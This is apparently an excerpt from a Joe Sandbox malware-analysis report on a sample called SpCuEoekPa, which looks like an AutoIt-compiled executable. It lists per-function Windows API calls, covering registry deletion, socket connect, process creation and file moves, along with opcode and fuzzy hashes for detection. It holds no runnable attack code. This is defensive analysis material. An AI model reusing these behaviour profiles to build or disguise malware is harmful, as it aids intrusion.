                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$AddressCreateInstanceProc
                                                            • String ID: ,,?$DllGetClassObject
                                                            • API String ID: 753597075-2169313111
                                                            • Opcode ID: a0aec1666e6d1213ebbcbe5ca786efcda7d304b8e2bc700e2ad1b45d814eb6c8
                                                            • Instruction ID: f59c35df17f43520a46ec7f7df7f63a045b3479666a66c51b8174c56bf1f1195
                                                            • Opcode Fuzzy Hash: a0aec1666e6d1213ebbcbe5ca786efcda7d304b8e2bc700e2ad1b45d814eb6c8
                                                            • Instruction Fuzzy Hash: 9C4192B5600204EFDB16CF54C884BDABBB9EF44318F1581A9EE099F645E7B1DD40CBA0
                                                            Function 003C3671 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 003C466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,003C3697,?), ref: 003C468B
                                                              • Part of subcall function 003C466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,003C3697,?), ref: 003C46A4
                                                            • lstrcmpiW.KERNEL32(?,?), ref: 003C36B7
                                                            • _wcscmp.LIBCMT ref: 003C36D3
                                                            • MoveFileW.KERNEL32(?,?), ref: 003C36EB
                                                            • _wcscat.LIBCMT ref: 003C3733
                                                            • SHFileOperationW.SHELL32(?), ref: 003C379F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                            • String ID: \*.*
                                                            • API String ID: 1377345388-1173974218
                                                            • Opcode ID: c6af9a79f1d2a76d5f57a99b496816427fcfd4e1a4bf919b1f68da7e43602877
                                                            • Instruction ID: d02c9fef834dc5e23815ae17e19230bae08037f65c784b700c66a5e9dc7b7fad
                                                            • Opcode Fuzzy Hash: c6af9a79f1d2a76d5f57a99b496816427fcfd4e1a4bf919b1f68da7e43602877
                                                            • Instruction Fuzzy Hash: 4A417FB1508344AEC753EF64C891EDF77ECAF89340F00496EB499C7251EA34DA89C756
                                                            Function 003E7291 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 003E72AA
                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003E7351
                                                            • IsMenu.USER32(?), ref: 003E7369
                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 003E73B1
                                                            • DrawMenuBar.USER32 ref: 003E73C4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Menu$Item$DrawInfoInsert_memset
                                                            • String ID: 0
                                                            • API String ID: 3866635326-4108050209
                                                            • Opcode ID: 1708645f9d319fc0058ac6a8720c130c4c13acb6a88027e6b17d6b661215ea4e
                                                            • Instruction ID: d134dbc700807f5d3bdf510242196e75022bb8251088be1683fdc1e40487003b
                                                            • Opcode Fuzzy Hash: 1708645f9d319fc0058ac6a8720c130c4c13acb6a88027e6b17d6b661215ea4e
                                                            • Instruction Fuzzy Hash: 6F415C75600259EFDB21DF51D884A9ABBF8FB05310F15862AFD059B290C770AD10DFA0
                                                            Function 003E0FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 003E0FD4
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003E0FFE
                                                            • FreeLibrary.KERNEL32(00000000), ref: 003E10B5
                                                              • Part of subcall function 003E0FA5: RegCloseKey.ADVAPI32(?), ref: 003E101B
                                                              • Part of subcall function 003E0FA5: FreeLibrary.KERNEL32(?), ref: 003E106D
                                                              • Part of subcall function 003E0FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 003E1090
                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 003E1058
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                            • String ID:
                                                            • API String ID: 395352322-0
                                                            • Opcode ID: f1ddcd235facbfd77223200115a043afe8df0570439768c30cc32524889a860d
                                                            • Instruction ID: 995aba2f21bc17eed292690256eafb0f9246057cb9ce048bb385cf836106850d
                                                            • Opcode Fuzzy Hash: f1ddcd235facbfd77223200115a043afe8df0570439768c30cc32524889a860d
                                                            • Instruction Fuzzy Hash: 7E310F71901159BFDB26DF91DC89EFFB7BCEF08310F000269E511A6191D6745E899AA0
                                                            Function 003E62CD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 003E62EC
                                                            • GetWindowLongW.USER32(01645CF8,000000F0), ref: 003E631F
                                                            • GetWindowLongW.USER32(01645CF8,000000F0), ref: 003E6354
                                                            • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 003E6386
                                                            • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 003E63B0
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 003E63C1
                                                            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 003E63DB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: LongWindow$MessageSend
                                                            • String ID:
                                                            • API String ID: 2178440468-0
                                                            • Opcode ID: 4bfc60c14d37d84ee49da08a838fbbc885e7fbeb662669eff4cf7422026698ff
                                                            • Instruction ID: 0c9217ecdbe77db21f7627641f2e82dbea3c6ba734e2836b74a5558f54a73120
                                                            • Opcode Fuzzy Hash: 4bfc60c14d37d84ee49da08a838fbbc885e7fbeb662669eff4cf7422026698ff
                                                            • Instruction Fuzzy Hash: A93116346402A09FDB22DF1ADC85F5837E5FB5A754F190264F510DF2F2CBB1A8408B51
                                                            Function 003BDAEB Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003BDB2E
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003BDB54
                                                            • SysAllocString.OLEAUT32(00000000), ref: 003BDB57
                                                            • SysAllocString.OLEAUT32(?), ref: 003BDB75
                                                            • SysFreeString.OLEAUT32(?), ref: 003BDB7E
                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 003BDBA3
                                                            • SysAllocString.OLEAUT32(?), ref: 003BDBB1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                            • String ID:
                                                            • API String ID: 3761583154-0
                                                            • Opcode ID: f0a0deb585fb0394d52c5bbe430c8e0ad83615d2a3782ea309a2a53f5011e387
                                                            • Instruction ID: 6b9cb70e32e6d7c40ad34ce380f735ce4a0410559008c3cff9657f3f90cbd9d3
                                                            • Opcode Fuzzy Hash: f0a0deb585fb0394d52c5bbe430c8e0ad83615d2a3782ea309a2a53f5011e387
                                                            • Instruction Fuzzy Hash: 08219236600219AFDF11EFA9DC88CFB73ACEB09364B018565FA14DB6A0E6709D458B60
                                                            Function 003D6173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 003D7D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 003D7DB6
                                                            • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 003D61C6
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 003D61D5
                                                            • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 003D620E
                                                            • connect.WSOCK32(00000000,?,00000010), ref: 003D6217
                                                            • WSAGetLastError.WSOCK32 ref: 003D6221
                                                            • closesocket.WSOCK32(00000000), ref: 003D624A
                                                            • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 003D6263
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                            • String ID:
                                                            • API String ID: 910771015-0
                                                            • Opcode ID: 291a803e8fefe33624876894dd8f06615f91688f1726d48f3fc336ee1edcce62
                                                            • Instruction ID: 0874b6e8859931b423ed68a422c59770b2f15c469cdbe1156fd8f5a51fe15692
                                                            • Opcode Fuzzy Hash: 291a803e8fefe33624876894dd8f06615f91688f1726d48f3fc336ee1edcce62
                                                            • Instruction Fuzzy Hash: C531D572600104AFEF11AF24DC86BBD77ADEF45750F04842AFD159B291DB70AC048BA1
                                                            Function 003BF65E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: __wcsnicmp
                                                            • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                            • API String ID: 1038674560-2734436370
                                                            • Opcode ID: 91496b5d6bde522845ae3543331c322f5b59c76a5f4e696693a030e8c27b268c
                                                            • Instruction ID: 5f114c2510c0ced898e4a8f4365868f10f98ed100b7d9e29dc4393698db56a20
                                                            • Opcode Fuzzy Hash: 91496b5d6bde522845ae3543331c322f5b59c76a5f4e696693a030e8c27b268c
                                                            • Instruction Fuzzy Hash: F9212572205611AFD223B634AC03FF77398EF55788B11507AFA458A951EB909E42C395
                                                            Function 003BDBC4 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003BDC09
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003BDC2F
                                                            • SysAllocString.OLEAUT32(00000000), ref: 003BDC32
                                                            • SysAllocString.OLEAUT32 ref: 003BDC53
                                                            • SysFreeString.OLEAUT32 ref: 003BDC5C
                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 003BDC76
                                                            • SysAllocString.OLEAUT32(?), ref: 003BDC84
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                            • String ID:
                                                            • API String ID: 3761583154-0
                                                            • Opcode ID: 475e8a23e0f481dc07be11f7f32017a8eb6cd997276e805ba39d856f6b0e8e05
                                                            • Instruction ID: aca72efe8967c5b629f467a6315d59e8c68a0450ad798c92abb19f6a3768d297
                                                            • Opcode Fuzzy Hash: 475e8a23e0f481dc07be11f7f32017a8eb6cd997276e805ba39d856f6b0e8e05
                                                            • Instruction Fuzzy Hash: AD217435604205AF9B15EFA9DC88DFB77ECEB08364B118125FA14CB6E1E6B0DC41CB64
                                                            Function 003E75CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00361D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00361D73
                                                              • Part of subcall function 00361D35: GetStockObject.GDI32(00000011), ref: 00361D87
                                                              • Part of subcall function 00361D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00361D91
                                                            • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 003E7632
                                                            • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 003E763F
                                                            • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 003E764A
                                                            • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 003E7659
                                                            • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 003E7665
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CreateObjectStockWindow
                                                            • String ID: Msctls_Progress32
                                                            • API String ID: 1025951953-3636473452
                                                            • Opcode ID: 261774995b98c691d46fcd24c0d42778d7ab97fdcb7080a9aaf8511822c944a4
                                                            • Instruction ID: 1ca63347fcfabba9b06d61ef5b3d98a5499b4664e2356cc2877e29b6133696d9
                                                            • Opcode Fuzzy Hash: 261774995b98c691d46fcd24c0d42778d7ab97fdcb7080a9aaf8511822c944a4
                                                            • Instruction Fuzzy Hash: AB11B6B1150129BFEF118F65CC85EE77F5DEF08798F114215F604A6090C7729C21DBA4
                                                            Function 00389AE6 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __init_pointers.LIBCMT ref: 00389AE6
                                                              • Part of subcall function 00383187: EncodePointer.KERNEL32(00000000), ref: 0038318A
                                                              • Part of subcall function 00383187: __initp_misc_winsig.LIBCMT ref: 003831A5
                                                              • Part of subcall function 00383187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00389EA0
                                                              • Part of subcall function 00383187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00389EB4
                                                              • Part of subcall function 00383187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00389EC7
                                                              • Part of subcall function 00383187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00389EDA
                                                              • Part of subcall function 00383187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00389EED
                                                              • Part of subcall function 00383187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00389F00
                                                              • Part of subcall function 00383187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00389F13
                                                              • Part of subcall function 00383187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00389F26
                                                              • Part of subcall function 00383187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00389F39
                                                              • Part of subcall function 00383187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00389F4C
                                                              • Part of subcall function 00383187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00389F5F
                                                              • Part of subcall function 00383187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00389F72
                                                              • Part of subcall function 00383187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00389F85
                                                              • Part of subcall function 00383187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00389F98
                                                              • Part of subcall function 00383187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00389FAB
                                                              • Part of subcall function 00383187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00389FBE
                                                            • __mtinitlocks.LIBCMT ref: 00389AEB
                                                            • __mtterm.LIBCMT ref: 00389AF4
                                                              • Part of subcall function 00389B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00389AF9,00387CD0,0041A0B8,00000014), ref: 00389C56
                                                              • Part of subcall function 00389B5C: _free.LIBCMT ref: 00389C5D
                                                              • Part of subcall function 00389B5C: DeleteCriticalSection.KERNEL32(02B,?,?,00389AF9,00387CD0,0041A0B8,00000014), ref: 00389C7F
                                                            • __calloc_crt.LIBCMT ref: 00389B19
                                                            • __initptd.LIBCMT ref: 00389B3B
                                                            • GetCurrentThreadId.KERNEL32 ref: 00389B42
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                            • String ID:
                                                            • API String ID: 3567560977-0
                                                            • Opcode ID: 78878b49b7fbbee4099abe6d257dfea8e09c6adfccb2fce2ed563ded34325cad
                                                            • Instruction ID: 4c995edd790c22a5aab8edfa7e60d6572c0e06003f26e42c97bf292fbed6e2c8
                                                            • Opcode Fuzzy Hash: 78878b49b7fbbee4099abe6d257dfea8e09c6adfccb2fce2ed563ded34325cad
                                                            • Instruction Fuzzy Hash: B7F0F0322193115AE63B7775BC037AA2690DF02730F294AEBF820DE0D2FF20880143A4
                                                            Function 003EB635 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40processCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 003EB644
                                                            • _memset.LIBCMT ref: 003EB653
                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00426F20,00426F64), ref: 003EB682
                                                            • CloseHandle.KERNEL32 ref: 003EB694
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: _memset$CloseCreateHandleProcess
                                                            • String ID: oB$doB
                                                            • API String ID: 3277943733-2474204165
                                                            • Opcode ID: 244b7d89f2c904f521b3a5dabafcbc18a98352f5f573d4fa25c99a4ad2907fb4
                                                            • Instruction ID: 8e90c14475dd40336a24aafa8c9cecf98d4e6b6988429cb10abf83470bbb5710
                                                            • Opcode Fuzzy Hash: 244b7d89f2c904f521b3a5dabafcbc18a98352f5f573d4fa25c99a4ad2907fb4
                                                            • Instruction Fuzzy Hash: FBF05EB6640350BEEA222761BD46FBB7A9CEB08395F424031BA08E9196D7754C0187AC
                                                            Function 0038406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00383F85), ref: 00384085
                                                            • GetProcAddress.KERNEL32(00000000), ref: 0038408C
                                                            • EncodePointer.KERNEL32(00000000), ref: 00384097
                                                            • DecodePointer.KERNEL32(00383F85), ref: 003840B2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                            • String ID: RoUninitialize$combase.dll
                                                            • API String ID: 3489934621-2819208100
                                                            • Opcode ID: 5b1f5e770d6cd72e13dcdb83062702aceafbf81200ab837ab072775ae4168e0a
                                                            • Instruction ID: e44d5e30d74244cf066a6f0790b4978c2b37953b306b7a34a8413ee089e193c6
                                                            • Opcode Fuzzy Hash: 5b1f5e770d6cd72e13dcdb83062702aceafbf81200ab837ab072775ae4168e0a
                                                            • Instruction Fuzzy Hash: D0E012B4681304EFEA32AF60EC49B623AB8B704743F504238F611E90E0CFBA4211CB08
                                                            Function 003C64B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: _memmove$__itow__swprintf
                                                            • String ID:
                                                            • API String ID: 3253778849-0
                                                            • Opcode ID: 76b414fce70ed4315a476acb9bc9480d4d23d6fdfacab3245a9398dc4472c5c6
                                                            • Instruction ID: b0f60ba9f542841947e6e5bd083712e90b64b5818952ae5d395d147d10a55f3c
                                                            • Opcode Fuzzy Hash: 76b414fce70ed4315a476acb9bc9480d4d23d6fdfacab3245a9398dc4472c5c6
                                                            • Instruction Fuzzy Hash: DD617A30500A5A9BCF07EF64CC82FFE37A9AF09308F448559F9599B296DB34AD15CB50
                                                            Function 003E01E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
